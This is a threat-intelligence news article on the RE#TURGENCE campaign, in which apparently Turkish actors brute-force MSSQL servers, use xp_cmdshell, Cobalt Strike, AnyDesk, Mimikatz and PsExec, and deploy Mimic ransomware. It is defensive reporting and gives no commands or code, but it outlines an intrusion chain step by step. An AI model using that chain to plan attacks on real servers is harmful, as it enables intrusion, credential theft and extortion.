Turkish Hackers' RE#TURGENCE Campaign Hits MSSQL Servers and Paves a Path to Ransomware
In an ongoing threat campaign, Turkish hackers are deploying Mimic ransomware payloads against organizations in the United States, European Union, and Latin America. Codenamed RE#TURGENCE by the Securonix Threat Research team, this campaign specifically targets vulnerable MSSQL servers. Driven by financial gains, these Turkish threat actors exhibit sophisticated techniques to access and exploit database servers. Securonix's investigation of the intrusions discovered the threat actor’s campaign "end in one of two ways, either the selling of “access” to the compromised host, or the ultimate delivery of ransomware payloads."
The attacker's initial breach is achieved through brute-forcing MSSQL administrative passwords. Once inside, attackers use the xp_cmdshell procedure, to run malicious commands with a command shell. The intrusion unfolds through a multi-stage process: execution of encoded PowerShell commands to fetch and run further scripts from remote servers; deployment of the Cobalt Strike payload using evasion techniques; and installation of AnyDesk for direct control. A batch script was used to silently install the AnyDesk service also create a user account, and add the account to the administrators group.
To gather credentials from the attackers added a registry entry that enables WDigest credential caching in allowing plaintext passwords to be stored in memory, which is then extracted using tools like Mimikatz. Discovery activities involve scanning the network with the Advanced Port Scanner tool and gathering additional domain and host details. The context gathered from discovery efforts and the stolen credentials, facilitated lateral movements across the network using Psexec. The culmination of the attack is the execution of Mimic ransomware, leading to data encryption and ransom extortion.Securonix's report also gives insights into OPSEC blunders the threat actors revealing chat communication, Amazon EC2 instance names, and an AnyDesk password.
Further investigations by BleepingComputer revealed connections linking the threat actors to Phobos ransomware incidents, evidenced by the use of the email address datenklause0@gmail[.]com in the ransom note. The detection insights provided through Securonix's report offer a comprehensive look at the RE#TURGENCE campaign, providing valuable insights into the threat actor's TTPs.